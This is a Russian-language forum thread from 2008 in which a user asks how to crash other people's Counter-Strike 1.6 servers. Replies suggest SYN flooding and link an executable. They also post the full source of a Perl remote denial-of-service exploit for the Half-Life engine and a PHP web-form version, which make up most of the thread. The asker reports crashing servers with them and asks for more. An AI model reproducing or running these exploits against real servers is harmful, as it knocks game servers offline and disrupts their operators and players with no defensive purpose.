Просмотр полной версии : Завалить локальный сервак Cs
InfernoNet
14.03.2008, 21:40
Нужно положить в сети сервак Counter-Strike 1.6.
Какие способы есть?
Взять кувалду и разнести его!
не слышал не об одной уязвимости в кс, их и не будет
потому что нормальные люди такими вещами не занимаются)
P.s^учись играть)
InfernoNet
14.03.2008, 22:14
Не буду говорить, что я профессиональный игрок, но играть умею и за раунд фраг-два уношу с собой в dead)))
Мне просто нужно его закидать чем нибудь, чтоб он полагал хорошо или еще что.
скань сервак на уязвимости(я не сказал что в винде нет уязвимостей)
а там уже как карты лягут)
один вопрос этот сервак стоит у кого то дома?
если да то есть просто и безобидное решение
завалить его мессагами от службы сообщений мелкомягких
http://www.google.ru/search?aq=f&complete=1&hl=ru&newwindow=1&q=Net+Send+program&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&lr=
тока учти что ему будет видно твой ип
InfernoNet
14.03.2008, 22:37
А может быть есть какая-то прога, которая посылает кучу пакетов огромных и засоряет канал?
Какой канал???=)
бот сеть для тебя я думаю рановато)
Просто SYN-floodом его можно попробовать закидать. В локалке оно хорошо работать должно ))
InfernoNet
14.03.2008, 23:24
Просто SYN-floodом его можно попробовать закидать. В локалке оно хорошо работать должно ))
Прочел описание о SYN-flood'e. Звучит заманчиво.
Какой софт использовать для этого нужно? И буду признателен, если согласишься помочь желательно через ICQ.
gold-goblin
14.03.2008, 23:34
Парни вы че????
времена net send уже прошли давненько.....
SYN - flood'ом ты его не завалиш с одного компа =))))))))))) да темболее фаерволы рулят (даже брендмауер)
не слышал не об одной уязвимости в кс, их и не будет
Ващето поиск юзать надо.....
Бага есть и есть php скрипт и ехе фаил для ее эксплатации.....
да ссори оказывается есть)))
exe _http://rapidshare.com/files/35155810/CSHack.exe
на перле:
#!/usr/bin/perl
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];
if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;
sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";
sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);
$c2=$c[1];
$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362 58af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
и на пхп
<html>
<head>
<title>PHP Counter Strike DOS Poc</title>
<style type="text/css">
input {
width: 150px;
}
td {
font-size: 12px;
font-family: Verdana, "Trebuchet MS";
text-align: left;
}
span.err {
color: red;
}
span.ok {
color: green;
}
</style>
</head>
<body onload="checkpass()">
<div style="width: 210px; margin: auto;">
<form name="csform" method="post" action="cs.php">
<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">
<tr>
<td style="width: 50px;">Host</td>
<td colspan="2"><input name="host" type="text" value=""/></td>
</tr>
<tr>
<td>Port</td>
<td colspan="2"><input name="port" type="text" value=""/></td>
</tr>
<tr>
<td> </td>
<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>
<td>Auth Type 2</td>
</tr>
<tr>
<td>Pass</td>
<td colspan="2"><input name="pass" type="text" value="" /></td>
</tr>
<tr>
<td> </td>
<td colspan="2"><input type="submit" Value="Run"/></td>
</tr>
</table>
<br/>
</form>
</div>
<center>Written by gemaglabin.Bug was found by .FUF.Thx 2 Sax-mmS<br>
</body>
</html>
<?php
/*
CS-dos exploit made by gemaglabin
Bug was discovered by .FUF # 111596
Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server http://www.softoplanet.ru/style_emoticons/default/biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su
underwater.cup.su
*/
ini_set("display_errors","0");
function HELLO_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "TSource Engine Query";
$packet .= pack("H*","00");
return $packet;
}
function CHALLENGE_PACKET()
{
$packet = pack("H*","FFFFFFFF");
$packet .= "getchallenge valve";
$packet .= pack("H*","00");
return $packet;
}
function LOGIN_PACKET_4()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';
$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\c l_lc\1\cl_lw\1\cl_updaterate\30\mod';
$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fi d\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","220A0000EE02");
return $packet;
}
function LOGIN_PACKET_2()
{
global $cookie;
global $password;
$packet = pack("H*","FFFFFFFF");
$packet .= "connect 47 ";
$packet .= $cookie.' "';
$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';
$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updater ate\30\model\gordon\nam';
$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fi d\0\pass';
$packet .= 'word\\'.$password;
$packet .= pack("H*","22");
return $packet;
}
function dowork($host,$port,$password,$auth)
{
global $password;
global $cookie;
# connecting to target host
$fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);
if (!$fsock) die ($errstr);
else
{
# sending hello packet
fwrite ($fsock,HELLO_PACKET());
fread ($fsock,100);
# sending chalennge packet
fwrite ($fsock,CHALLENGE_PACKET());
# recieving cookies
$resp = fread($fsock,100);
# grab cookies from packet
$cookie = substr($resp,strpos($resp,"A00000000")+10);
$cookie = substr($cookie,0,strpos($cookie," "));
# sending login packet
if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());
$resp = fread($fsock,100);
}
}
IF (isset($_POST['host']) && isset($_POST['port']))
{
IF (empty($_POST['pass'])) $password = "123";
else $password = $_POST['pass'];
$fserver = $_POST['host'];
$fport = $_POST['port'];
if (isset($_POST['auth'])) $fauth = true;else $fauth=false;
# we have to connect 2 times
$result = dowork($fserver,$fport,$password,$fauth);
$result = dowork($fserver,$fport,$password,$fauth);
# parsing result
echo "Exploit Sent";
}
?>
InfernoNet
15.03.2008, 15:14
А какой пароль то вводить надо? :)
Мне все время выдает:
Not done! Please, check IP address and port or password!
И где можно скачать сам perl для запуска скрипта на перле?
Pernat1y
15.03.2008, 15:59
пароль игрока на подключение там по-идее
пробуй этот http://milw0rm.org/exploits/4856
InfernoNet
15.03.2008, 16:20
пароль игрока на подключение там по-идее
пробуй этот http://milw0rm.org/exploits/4856
При нажатие на кнопку "Run" перекидывает на главную стр.
InfernoNet
16.03.2008, 00:35
Со всем разобрался.
Вопрос таков.
Несколько серваков падать не хотят, есть другие варианты?
Со всем разобрался.
Вопрос таков.
Несколько серваков падать не хотят, есть другие варианты?
Мудачьё, забанели за читы небойсь, терь надо завалить сервак! Чтоб у тя инет отвалился когда dos будешь делать! И пальцы паламать тебе надо! Одним неудачным }{@K3RROM станет меньше =/
Мудачьё, забанели за читы небойсь, терь надо завалить сервак! Чтоб у тя инет отвалился когда dos будешь делать! И пальцы паламать тебе надо! Одним неудачным }{@K3RROM станет меньше =/
Единственная умная фраза на весь топик)
А автор - клоун. Юзай гугл.
InfernoNet
16.03.2008, 11:27
Мудачьё, забанели за читы небойсь, терь надо завалить сервак! Чтоб у тя инет отвалился когда dos будешь делать! И пальцы паламать тебе надо! Одним неудачным }{@K3RROM станет меньше =/
Убейся, я в кс редко играю. В основном в War Craft.
А если в CS, то в source.
А валить серваки просто интересно. Так что автар - из тебя Ванга, как из Ванги строитель.
А автор - клоун. Юзай гугл.
Если я клоун, то ты шарик от носа клоуна.
InfernoNet
16.03.2008, 11:30
Собственно по теме:
Проюзал скрипты и прогу.
Какие то серваки падают, а какие-то нет. Нужены еще варианты.
LoneWolf666
16.03.2008, 11:58
на каких то серваках дыры есть, на каких то их закрывают, прикинь?
гугли тулзу универсальный хек, она тебе поможет повалить всё что хочешь.
недавно включили в неё удобную валилку кс-серваков. на ней ешё и бобла приподнять немного можно
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot